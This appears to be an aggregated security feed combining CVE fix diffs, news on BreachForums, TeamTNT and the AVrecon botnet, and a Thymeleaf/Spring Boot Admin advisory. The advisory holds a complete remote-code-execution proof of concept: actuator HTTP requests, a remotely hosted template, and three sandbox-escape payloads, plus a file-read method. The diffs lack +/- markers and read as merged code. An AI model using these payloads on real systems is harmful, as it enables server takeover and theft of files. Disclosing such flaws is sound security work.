 SQL Injection in GitHub repository pimcore/pimcore prior to 10.5.24.

Expand Up

@@ -37,12 +37,12 @@ public static function extractSortingSettings($params)

$sortParam = json\_decode($sortParam, true);

$sortParam = $sortParam\[0\];

  

$order = strtoupper($sortParam\['direction'\]) === 'DESC' ? 'DESC' : 'ASC';

  

if (substr($sortParam\['property'\], 0, 1) != '~') {

$orderKey = $sortParam\['property'\];

$order = $sortParam\['direction'\];

} else {

$orderKey = $sortParam\['property'\];

$order = $sortParam\['direction'\];

  

$parts = explode('~', $orderKey);

  

Expand Down

CVE-2023-3673: [Task]: Improve Admin translation and application logger sorting (#15… · pimcore/pimcore@a06ce0a

By Waqas
According to court documents, devices owned by Pompompurin contained 600 explicit images of child abuse, which led him to plead guilty in court.
This is a post from HackRead.com Read the original post: BreachForums’ Pompompurin Pleads Guilty to Holding Child Abuse Content

**The court document described the disturbing content as “videos depicting prepubescent minors and minors who had not attained 12 years of age engaging in s\*\*ually explicit conduct.”**

Conor Brian Fitzpatrick, known by his online aliases Pompompurin and Pom, a 2021 graduate of Peekskill High School, was **arrested in March 2023**, for his involvement in operating the notorious hacker and cybercriminal platform called BreachForums. The arrest has also revealed a disturbing link to another illegal activity involving child abuse images.

**Court documents** (PDF) seen by Hackread.com shed light on the dark secrets hidden within Fitzpatrick’s digital possessions. It has been discovered that his devices contained over 600 explicit images of child abuse, leading him to plead guilty in court.

The court document described the disturbing content as “videos depicting prepubescent minors and minors who had not attained 12 years of age engaging in sexually explicit conduct.”

This new development was first **reported** by Dissent Doe of the Databreaches blog. It then went viral on Twitter when vx-underground, an online library for malware samples, **tweeted** about it.

The trial for Pompompurin, as he is known online, is scheduled to commence on November 17th. However, he is subject to strict restrictions, including no access to computers, no contact with minors, no browsing of websites focused on data leaks and no usage of virtual private networks (VPNs).

It is worth noting that the arrest of Fitzpatrick came in the wake of the **apprehension of Diogo Santos Coelho**, the owner and administrator of Raid Forums in the United Kingdom. BreachForums, which emerged as a reincarnation of Raid Forums, was **seized by the FBI** (Federal Bureau of Investigation) in their crackdown against cybercriminal activities.

Despite the intervention, a new version of **BreachForums has recently resurfaced**, now under the control of the infamous ShinyHunters group.

BreachForums and its predecessor, Raid Forums, have long been known as platforms where hackers and cybercriminals gather to exchange stolen data, hacking techniques, and illicit tools.

These forums have been a cause of concern for law enforcement agencies worldwide due to their role in facilitating various cybercrimes, including data breaches and **identity theft**.

The emergence of a new incarnation of BreachForums, led by the notorious ShinyHunters group, raises alarm bells for cybersecurity experts. The ShinyHunters group has been i**nvolved in high-profile cyberattacks**, often targeting corporations, government entities, and financial institutions. Their expertise and influence within the hacking community make them a formidable force to reckon with.

As the trial of Conor Brian Fitzpatrick approaches, many await the legal proceedings with a sense of urgency. The case not only highlights the dangers posed by cybercriminal forums but also sheds light on the dark underbelly of illegal activities involving child abuse imagery.

Hackread.com will continue to closely follow this case and provide updates as more information becomes available.

Note: Hackread.com encourages readers to report any suspicious online activities related to child abuse imagery to the appropriate law enforcement authorities.

**RELATED ARTICLES**

1.  5 Ways to Ensure Your Child’s Online Safety
2.  Authorities seize world’s biggest dark web child abuse site
3.  Data Breach at New BreachForums: 4,000 members’ data leaked
4.  Gender Diversity in Cybercrime Forums: Women Users on the Rise
5.  Raidforums Database Leak: Data of 460,000 Users Dumped Online

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

BreachForums’ Pompompurin Pleads Guilty to Holding Child Abuse Content

webmention.js prior to 0.5.5 is vulnerable to cross-site scripting.

**webmention.js Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Jul 14, 2023 to the GitHub Advisory Database • Updated Jul 14, 2023

GHSA-r54g-4qq6-chxg: webmention.js Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - DOM in GitHub repository plaidweb/webmention.js prior to 0.5.5.

Expand Up

@@ -188,10 +188,12 @@ A more detailed example:

\* @returns {string}

\*/

function entities(text) {

return text.replace(/&/g, "&amp;")

.replace(/</g, "&lt;")

.replace(/\>/g, "&gt;")

.replace(/"/g, "&quot;");

return text.replace(/\[&<>"\]/g, (tag) \=> ({

'&': '&amp;',

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

}\[tag\] || tag));

}

  

/\*\*

Expand Down Expand Up

@@ -327,7 +329,7 @@ A more detailed example:

let linktext \= \`(${t("mention")})\`;

if (c.name) {

linkclass \= "name";

linktext \= c.name;

linktext \= entities(c.name);

} else if (c.content && c.content.text) {

linkclass \= "text";

linktext \= extractComment(c);

Expand Down

CVE-2023-3672: XSS mitigation · PlaidWeb/webmention.js@3551b66

A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS).
The findings come from SentinelOne and Permiso, which said the "campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew,"

Cyber Threat / Cloud Security

A malicious actor has been linked to a cloud credential stealing campaign in June 2023 that's focused on Azure and Google Cloud Platform (GCP) services, marking the adversary's expansion in targeting beyond Amazon Web Services (AWS).

The findings come from SentinelOne and Permiso, which said the "campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew," although it emphasized that "attribution remains challenging with script-based tools."

They also overlap with an ongoing TeamTNT campaign disclosed by Aqua called Silentbob that leverages misconfigured cloud services to drop malware as part of what's said to be a testing effort, while also linking SCARLETEEL attacks to the threat actor, citing infrastructure commonalities.

"TeamTNT is scanning for credentials across multiple cloud environments, including AWS, Azure, and GCP," Aqua noted.

The attacks, which single out public-facing Docker instances to deploy a worm-like propagation module, are a continuation of an intrusion set that previously targeted Jupyter Notebooks in December 2022.

As many as eight incremental versions of the credential harvesting script have been discovered between June 15, 2023, and July 11, 2023, indicating an actively evolving campaign.

The newer versions of the malware are designed to gather credentials from AWS, Azure, Google Cloud Platform, Censys, Docker, Filezilla, Git, Grafana, Kubernetes, Linux, Ngrok, PostgreSQL, Redis, S3QL, and SMB. The harvested credentials are then exfiltrated to a remote server under the threat actor's control.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

SentinelOne said the credentials collection logic and the files targeted bears similarities to a Kubelet-targeting campaign undertaken by TeamTNT in September 2022.

Alongside the shell script malware, the threat actor has also been observed distributing a Golang-based ELF binary that acts as a scanner to propagate the malware to vulnerable targets. The binary further drops a Golang network scanning utility called Zgrab.

"This campaign demonstrates the evolution of a seasoned cloud actor with familiarity across many technologies," security researchers Alex Delamotte, Ian Ahl, and Daniel Bohannon said. "The meticulous attention to detail indicates the actor has clearly experienced plenty of trial and error."

"This actor is actively tuning and improving their tools. Based on the tweaks observed across the past several weeks, the actor is likely preparing for larger scale campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

TeamTNT's Cloud Credential Stealing Campaign Now Targets Azure and Google Cloud

A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries.
Lumen Black Lotus Labs has dubbed the malware AVrecon, making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year.
"This makes AVrecon one

Network Security / Malware

A new malware strain has been found covertly targeting small office/home office (SOHO) routers for more than two years, infiltrating over 70,000 devices and creating a botnet with 40,000 nodes spanning 20 countries.

Lumen Black Lotus Labs has dubbed the malware **AVrecon**, making it the third such strain to focus on SOHO routers after ZuoRAT and HiatusRAT over the past year.

"This makes AVrecon one of the largest SOHO router-targeting botnets ever seen," the company said. "The purpose of the campaign appears to be the creation of a covert network to quietly enable a range of criminal activities from password spraying to digital advertising fraud."

A majority of the infections are located in the U.K. and the U.S., followed by Argentina, Nigeria, Brazil, Italy, Bangladesh, Vietnam, India, Russia, and South Africa, among others.

AVrecon was first highlighted by Kaspersky senior security researcher Ye (Seth) Jin in May 2021, indicating that the malware has managed to avoid detection until now.

In the attack chain detailed by Lumen, a successful infection is followed by enumerating the victim's SOHO router and exfiltrating that information back to an embedded command-and-control (C2) server.

It also checks if other instances of malware are already running on the host by searching for existing processes on port 48102 and opening a listener on that port. A process bound to that port is terminated.

The next stage involves the compromised system establishing contact with a separate server, called the secondary C2 server, to await further commands. Lumen said it identified 15 such unique servers that have been active since at least October 2021.

It's worth noting that tiered C2 infrastructure is prevalent among notorious botnets like Emotet and QakBot.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

AVrecon is written in the C programming language, making it easy to port the malware for different architectures. What's more, a crucial reason why such attacks work is because they leverage infrastructure living on the edge that typically lacks support for security solutions.

Evidence gathered so far points to the botnet being used for clicking on various Facebook and Google ads, and to interact with Microsoft Outlook. This likely indicates a two-pronged effort to conduct advertising fraud and data exfiltration.

"The manner of attack seems to focus predominantly on stealing bandwidth – without impacting end-users – in order to create a residential proxy service to help launder malicious activity and avoid attracting the same level of attention from Tor-hidden services or commercially available VPN services," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New SOHO Router Botnet AVrecon Spreads to 70,000 Devices Across 20 Countries

Thymeleaf through 3.1.1.RELEASE, as used in spring-boot-admin (aka Spring Boot Admin) through 3.1.1 and other products, allows sandbox bypass via crafted HTML. This may be relevant for SSTI (Server Side Template Injection) and code execution in spring-boot-admin if MailNotifier is enabled and there is write access to environment variables via the UI.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-38286

**Thymeleaf allows sandbox bypass via crafted HTML**

Moderate severity GitHub Reviewed Published Jul 14, 2023 to the GitHub Advisory Database • Updated Jul 14, 2023

**Package**

maven org.thymeleaf:thymeleaf-parent (Maven)

**Affected versions**

<= 3.1.1.RELEASE

Published to the GitHub Advisory Database

Jul 14, 2023

Last updated

Jul 14, 2023

GHSA-7gj7-224w-vpr3: Thymeleaf allows sandbox bypass via crafted HTML

**Impact**

All users who run Spring Boot Admin Server, having enabled MailNotifier and write access to environment variables via UI are possibly affected.

The vulnerability affects the product and version range：

    # 2023-07-05
    spring-boot-admin <= 3.1.0
    thymeleaf <= 3.1.1.RELEASE
    

**RCE POC**

all the proof environment is provided from this github repository.

when you started the springboot-admin environment,then you can follow the steps as below to getshell:

first, write a html named poc3.html:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
\>
    <td\>
        <a
                th:with\="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        \>
            <a
                    th:with\="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

then put the poc3.html into your VPS,and start a HTTPServer which the spring-boot-admin app can access.

and then send this HTTP package to enable MailNotifier:

    POST /actuator/env HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 63
    
    {"name":"spring.boot.admin.notify.mail.enabled","value":"true"}
    

send this HTTP package to modify the email template, which is our malicious html file's address.

    POST /actuator/env HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 91
    
    {"name":"spring.boot.admin.notify.mail.template","value":"http://127.0.0.1:4578/poc3.html"}
    

send this HTTP package to refresh the modify:

    POST /actuator/refresh HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 2
    
    {}
    

finally,send this HTTP package to the spring-boot-admin app to trigger offline notification,and you will getshell immediately.

    POST /instances HTTP/1.1
    Accept: application/json
    Content-Type: application/json
    User-Agent: Java/17.0.6
    Host: 127.0.0.1:8080
    Content-Length: 178
    
    {"name":"test","managementUrl":"http://127.0.0.1:1","healthUrl":"http://127.0.0.1:1","serviceUrl":"http://127.0.0.1:1","metadata":{"startup":"2024-09-04T14:49:12.6694287+08:00"}}
    

**Arbitrary-file-read POC**

When you have configured mail notifications success,for example：

then you can configure the template attribute of MailNotifier to be a local file of the springboot-admin host or a file under the classpath of the springboot-admin app, and then modify the recipient of MailNotifier to be a malicious attacker. When an email notification is triggered, the malicious attacker will receive the corresponding template attribute files, resulting in arbitrary file reads.

if you modify the template attribute of MailNotifier to be a file under the classpath of the springboot-admin app, you even can get the application.properties file.

**Vulnerability analysis**

The reason for the vulnerability is that springboot-admin uses thymeleaf for HTML rendering, and thymeleaf has a sandbox bypass vulnerability. If thymeleaf renders a malicious HTML, RCE can be caused by using the thymeleaf sandbox to escape; at the same time, if the attacker can use the actuator to The template attribute of MailNotifier is changed to a remote html template, then springboot-admin will load malicious html from the attacker's server and use thymeleaf to render it, thus causing RCE; if the template attribute of MailNotifier is modified to the server's local file or classpath will cause arbitrary file reading;

The key positions of using thymeleaf to render HTML in springboot-admin are as follows:

If "this.template" is modified to a remote file, such as "http://xxx.xx/poc.html", then the html file will be loaded from the remote and rendered. With the sandbox escape vulnerability of thymeleaf, RCE can be performed;

The following are three thymeleaf sandbox escape pocs:

1.  This poc applies to versions prior to JDK9:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="defineClassMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('org.springframework.cglib.core.ReflectUtils',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'defineClass', ''.getClass() ,''.getBytes().getClass(), T(org.springframework.util.ClassUtils).forName('java.lang.ClassLoader',T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )}"
\>
    <td\>
        <a
                th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(defineClassMethod, null,
                    'fun.pinger.Hack',
                    T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAKgoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAoBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMSGFjazsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACUhhY2suamF2YQwACgALBwAiDAAjACQBAARjYWxjDAAlACYBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoAJwEABEhhY2sBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgEAD2Z1bi9waW5nZXIvSGFjawEAEUxmdW4vcGluZ2VyL0hhY2s7ACEACAAJAAAAAAACAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAAwAOAAAADAABAAAABQAPACkAAAAIABEACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAABwAJAAoADAAIAA0ACQAWAAsADgAAAAwAAQANAAkAEgATAAAAFAAAAAcAAkwHABUJAAEAFgAAAAIAFw=='),
                    new org.springframework.core.OverridingClassLoader(T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )
                }"
                th:href\="${param2}"
        \></a\>
    </td\>
</tr\>

</body\>
</html\>

2.  This POC applies to versions after JDK9:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="createMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'create' )}"
\>
    <td\>
        <a
                th:with\="shellObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(createMethod, null)}"
        \>
            <a
                    th:with\="evalMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'eval', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(evalMethod, shellObj,  new java.lang.String(T(org.springframework.util.Base64Utils).decodeFromString('amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoImNhbGMiKQ==')))
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

3.  This POC is applicable to all versions of JDK:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
\>
    <td\>
        <a
                th:with\="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        \>
            <a
                    th:with\="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

**Workarounds**

*   Disable any MailNotifier
*   Disable write access (POST request) on /env actuator endpoint
*   Limit the template attribute of MailNotifier to a few specific options, and avoid using the http:// or file:/// protocol

CVE-2023-38286: GitHub - p1n93r/SpringBootAdmin-thymeleaf-SSTI: SpringBootAdmin-thymeleaf-SSTI which can cause RCE

Improper Encoding or Escaping of Output in GitHub repository froxlor/froxlor prior to 2.0.21.

**Froxlor vulnerable to Improper Encoding or Escaping of Output**

Critical severity GitHub Reviewed Published Jul 14, 2023 to the GitHub Advisory Database • Updated Jul 14, 2023

Tag

#git